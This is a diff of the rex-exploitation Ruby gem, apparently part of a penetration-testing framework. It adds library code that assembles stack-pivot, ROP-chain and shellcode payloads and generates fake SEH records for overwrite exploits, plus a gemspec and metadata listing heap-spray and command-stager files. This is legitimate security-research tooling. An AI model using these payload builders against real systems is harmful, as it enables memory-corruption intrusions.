rex-exploitation 0.1.0

data/lib/rex/exploitation/ropdb.rb

@@ -0,0 +1,190 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rexml/document'
+
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides methods to access the ROP database, in order to generate
+# a ROP-compatible payload on the fly.
+#
+###
+class RopDb
+  def initialize
+    @base_path = File.join(File.dirname(__FILE__), '../../../data/ropdb/')
+  end
+
+  public
+
+
+  #
+  # Returns true if a ROP chain is available, otherwise false
+  #
+  def has_rop?(rop_name)
+    File.exist?(File.join(@base_path, "#{rop_name}.xml"))
+  end
+
+  #
+  # Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
+  # some integer).  When the value is a symbol, it can be one of these: :nop, :junk, :size,
+  # :unsafe_negate_size, and :safe_negate_size
+  # Note if no RoP is found, it returns an empry array.
+  # Arguments:
+  # rop_name - name of the ROP chain.
+  # opts     - A hash of optional arguments:
+  #            'target' - A regex string search against the compatibility list.
+  #            'base'   - Specify a different base for the ROP gadgets.
+  #
+  def select_rop(rop, opts={})
+    target = opts['target'] || ''
+    base   = opts['base']   || nil
+
+    raise RuntimeError, "#{rop} ROP chain is not available" if not has_rop?(rop)
+    xml = load_rop(File.join(@base_path, "#{rop}.xml"))
+
+    gadgets = []
+
+    xml.elements.each("db/rop") { |e|
+      name = e.attributes['name']
+      next if not has_target?(e, target)
+
+      if not base
+        default = e.elements['gadgets'].attributes['base'].scan(/^0x([0-9a-f]+)$/i).flatten[0]
+        base = default.to_i(16)
+      end
+
+      gadgets << parse_gadgets(e, base)
+    }
+    return gadgets.flatten
+  end
+
+
+  #
+  # Returns a payload with the user-supplied stack-pivot, a ROP chain,
+  # and then shellcode.
+  # Arguments:
+  # rop     - Name of the ROP chain
+  # payload - Payload in binary
+  # opts    - A hash of optional arguments:
+  #           'nop'      - Used to generate nops with generate_sled()
+  #           'badchars' - Used in a junk gadget
+  #           'pivot'    - Stack pivot in binary
+  #           'target'   - A regex string search against the compatibility list.
+  #           'base'     - Specify a different base for the ROP gadgets.
+  #
+  def generate_rop_payload(rop, payload, opts={})
+    nop      = opts['nop']      || nil
+    badchars = opts['badchars'] || ''
+    pivot    = opts['pivot']    || ''
+    target   = opts['target']   || ''
+    base     = opts['base']     || nil
+
+    rop = select_rop(rop, {'target'=>target, 'base'=>base})
+    # Replace the reserved words with actual gadgets
+    rop = rop.map {|e|
+      if e == :nop
+        sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
+      elsif e == :junk
+        Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
+      elsif e == :size
+        payload.length
+      elsif e == :unsafe_negate_size
+        get_unsafe_size(payload.length)
+      elsif e == :safe_negate_size
+        get_safe_size(payload.length)
+      else
+        e
+      end
+    }.pack("V*")
+
+    raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
+
+    return pivot + rop + payload
+  end
+
+  private
+
+
+  #
+  # Returns a size that's safe from null bytes.
+  # This function will keep incrementing the value of "s" until it's safe from null bytes.
+  #
+  def get_safe_size(s)
+    safe_size = get_unsafe_size(s)
+    while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
+      safe_size -= 1
+    end
+
+    safe_size
+  end
+
+
+  #
+  # Returns a size that might contain one or more null bytes
+  #
+  def get_unsafe_size(s)
+    0xffffffff - s + 1
+  end
+
+
+  #
+  # Checks if a ROP chain is compatible
+  #
+  def has_target?(rop, target)
+    rop.elements.each('compatibility/target') { |t|
+      return true if t.text =~ /#{target}/i
+    }
+    return false
+  end
+
+  #
+  # Returns the database in XML
+  #
+  def load_rop(file_path)
+    f = File.open(file_path, 'rb')
+    xml = REXML::Document.new(f.read(f.stat.size))
+    f.close
+    return xml
+  end
+
+
+  #
+  # Returns gadgets
+  #
+  def parse_gadgets(e, image_base)
+    gadgets = []
+    e.elements.each('gadgets/gadget') { |g|
+      offset = g.attributes['offset']
+      value  = g.attributes['value']
+
+      if offset
+        addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
+        gadgets << (image_base + addr.to_i(16))
+      elsif value
+        case value
+        when 'nop'
+          gadgets << :nop
+        when 'junk'
+          gadgets << :junk
+        when 'size'
+          gadgets << :size
+        when 'unsafe_negate_size'
+          gadgets << :unsafe_negate_size
+        when 'safe_negate_size'
+          gadgets << :safe_negate_size
+        else
+          gadgets << value.to_i(16)
+        end
+      else
+        raise RuntimeError, "Missing offset or value attribute in '#{name}'"
+      end
+    }
+    return gadgets
+  end
+end
+
+end
+end

data/lib/rex/exploitation/seh.rb

@@ -0,0 +1,93 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch/x86'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides methods for generating SEH registration records
+# in a dynamic and flexible fashion.  The records can be generated with
+# the short jump at a random offset into the next pointer and with random
+# padding in between the handler and the attacker's payload.
+#
+###
+class Seh
+
+  #
+  # Creates a new instance of the class and initializes it with the supplied
+  # bad character list.  The space argument denotes how much room is
+  # available for random padding and the NOP argument can be used to generate
+  # a random NOP sled that is better than 0x90.
+  #
+  def initialize(badchars = nil, space = nil, nop = nil)
+    self.badchars = badchars || ''
+    self.space    = (space && space > 121) ? 121 : space
+    self.nop      = nop
+  end
+
+  #
+  # Generates an SEH record
+  #
+  def generate_seh_record(handler, dynamic=false)
+    if (dynamic)
+      generate_dynamic_seh_record(handler)
+    else
+      generate_static_seh_record(handler)
+    end
+  end
+
+  #
+  # Generates a fake SEH registration record with the supplied handler
+  # address for the handler, and a nop generator to use when generating
+  # padding inside the next pointer.  The NOP generator must implement the
+  # 'generate_sled' method that takes a length and a list of bad
+  # characters.
+  #
+  def generate_dynamic_seh_record(handler)
+
+    # Generate the padding up to the size specified or 121 characters
+    # maximum to account for the maximum range of a short jump plus the
+    # record size.
+    pad    = rand(space || 121)
+    rsize  = pad + 8
+
+    # Calculate the random index into the next ptr to store the short jump
+    # instruction
+    jmpidx = rand(3)
+
+    # Build the prefixed sled for the bytes that come before the short jump
+    # instruction
+    sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)
+
+    # Seed the record and any space after the record with random text
+    record = Rex::Text.rand_text(rsize, badchars)
+
+    # Build the next pointer and short jump instruction
+    record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
+    record[0, jmpidx] = sled
+
+    # Set the handler in the registration record
+    record[4, 4]      = [ handler ].pack('V')
+
+    # Return the generated record to the caller
+    record
+  end
+
+  #
+  # Generates a static SEH registration record with a specific handler and
+  # next pointer.
+  #
+  def generate_static_seh_record(handler)
+    "\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
+  end
+
+protected
+
+  attr_accessor :badchars, :space, :nop # :nodoc:
+
+end
+
+end
+end

data/lib/rex/exploitation/version.rb

@@ -0,0 +1,5 @@
+module Rex
+  module Exploitation
+    VERSION = "0.1.0"
+  end
+end

data/rex-exploitation.gemspec

@@ -0,0 +1,35 @@
+# coding: utf-8
+lib = File.expand_path('../lib', __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require 'rex/exploitation/version'
+
+Gem::Specification.new do |spec|
+  spec.name          = "rex-exploitation"
+  spec.version       = Rex::Exploitation::VERSION
+  spec.authors       = ["David Maloney"]
+  spec.email         = ["DMaloney@rapid7.com"]
+
+  spec.summary       = %q{Ruby Exploitation(Rex) library for various exploitation helpers}
+  spec.description   = %q{This gem contains various helper mechanisms for creating exploits.
+                          This includes SEH Overwrite helpers, egghunters, command stagers and more.}
+  spec.homepage      = "https://github.com/rapid7/rex-exploitation"
+
+
+  spec.files         = `git ls-files -z`.split("\x0").reject do |f|
+    f.match(%r{^(test|spec|features)/})
+  end
+  spec.bindir        = "exe"
+  spec.executables   = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+  spec.require_paths = ["lib"]
+
+  spec.add_development_dependency "bundler", "~> 1.13"
+  spec.add_development_dependency "rake", "~> 10.0"
+  spec.add_development_dependency "rspec", "~> 3.0"
+
+  spec.add_runtime_dependency 'rex-text'
+  spec.add_runtime_dependency 'rex-arch'
+  spec.add_runtime_dependency 'rex-encoder'
+  spec.add_runtime_dependency 'metasm'
+  # Needed for Javascript obfuscation
+  spec.add_runtime_dependency 'jsobfu'
+end

metadata

@@ -0,0 +1,298 @@
+--- !ruby/object:Gem::Specification
+name: rex-exploitation
+version: !ruby/object:Gem::Version
+  version: 0.1.0
+platform: ruby
+authors:
+- David Maloney
+autorequire: 
+bindir: exe
+cert_chain:
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+  A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+  b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+  MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+  YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+  aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+  jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+  xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+  1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+  snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+  U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+  9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+  BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+  AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+  yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+  38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+  AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+  DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+  HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+  -----END CERTIFICATE-----
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+  A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+  b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
+  MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+  YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
+  IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
+  NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
+  o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
+  0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
+  jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
+  STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
+  O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
+  Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
+  PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
+  bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
+  bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
+  MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
+  PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
+  kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
+  jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
+  88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
+  fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
+  sGgOJO9K9gslJO8k
+  -----END CERTIFICATE-----
+- |
+  -----BEGIN CERTIFICATE-----
+  MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
+  MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
+  VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
+  NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
+  c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
+  MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
+  CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
+  /Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
+  tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
+  5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
+  edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
+  8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
+  AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
+  Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
+  VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
+  bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
+  MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
+  ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
+  bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
+  w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
+  SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
+  YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
+  1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
+  mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
+  2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
+  QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
+  -----END CERTIFICATE-----
+date: 2016-10-03 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: bundler
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.13'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.13'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '10.0'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.0'
+- !ruby/object:Gem::Dependency
+  name: rex-text
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rex-arch
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: rex-encoder
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: metasm
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+- !ruby/object:Gem::Dependency
+  name: jsobfu
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - ">="
+      - !ruby/object:Gem::Version
+        version: '0'
+description: |-
+  This gem contains various helper mechanisms for creating exploits.
+                            This includes SEH Overwrite helpers, egghunters, command stagers and more.
+email:
+- DMaloney@rapid7.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- ".rspec"
+- ".travis.yml"
+- CODE_OF_CONDUCT.md
+- Gemfile
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- data/exploits/cmdstager/debug_asm
+- data/exploits/cmdstager/debug_write
+- data/exploits/cmdstager/vbs_b64
+- data/exploits/cmdstager/vbs_b64_adodb
+- data/exploits/cmdstager/vbs_b64_noquot
+- data/exploits/cmdstager/vbs_b64_sleep
+- data/js/detect/ie_addons.js
+- data/js/detect/misc_addons.js
+- data/js/detect/os.js
+- data/js/memory/explib2/lib/explib2.js
+- data/js/memory/explib2/payload/drop_exec.js
+- data/js/memory/explib2/payload/exec.js
+- data/js/memory/heap_spray.js
+- data/js/memory/heaplib2.js
+- data/js/memory/mstime_malloc.js
+- data/js/memory/property_spray.js
+- data/js/network/ajax_download.js
+- data/js/network/ajax_post.js
+- data/js/network/xhr_shim.js
+- data/js/utils/base64.js
+- data/ropdb/flash.xml
+- data/ropdb/hxds.xml
+- data/ropdb/java.xml
+- data/ropdb/msvcrt.xml
+- data/ropdb/reader.xml
+- data/ropdb/samba.xml
+- data/ropdb/stagefright.xml
+- lib/rex/exploitation.rb
+- lib/rex/exploitation/cmdstager.rb
+- lib/rex/exploitation/cmdstager/base.rb
+- lib/rex/exploitation/cmdstager/bourne.rb
+- lib/rex/exploitation/cmdstager/certutil.rb
+- lib/rex/exploitation/cmdstager/debug_asm.rb
+- lib/rex/exploitation/cmdstager/debug_write.rb
+- lib/rex/exploitation/cmdstager/echo.rb
+- lib/rex/exploitation/cmdstager/printf.rb
+- lib/rex/exploitation/cmdstager/tftp.rb
+- lib/rex/exploitation/cmdstager/vbs.rb
+- lib/rex/exploitation/egghunter.rb
+- lib/rex/exploitation/encryptjs.rb
+- lib/rex/exploitation/heaplib.js.b64
+- lib/rex/exploitation/heaplib.rb
+- lib/rex/exploitation/js.rb
+- lib/rex/exploitation/js/detect.rb
+- lib/rex/exploitation/js/memory.rb
+- lib/rex/exploitation/js/network.rb
+- lib/rex/exploitation/js/utils.rb
+- lib/rex/exploitation/jsobfu.rb
+- lib/rex/exploitation/obfuscatejs.rb
+- lib/rex/exploitation/omelet.rb
+- lib/rex/exploitation/opcodedb.rb
+- lib/rex/exploitation/ropdb.rb
+- lib/rex/exploitation/seh.rb
+- lib/rex/exploitation/version.rb
+- rex-exploitation.gemspec
+homepage: https://github.com/rapid7/rex-exploitation
+licenses: []
+metadata: {}
+post_install_message: 
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubyforge_project: 
+rubygems_version: 2.4.8
+signing_key: 
+specification_version: 4
+summary: Ruby Exploitation(Rex) library for various exploitation helpers
+test_files: []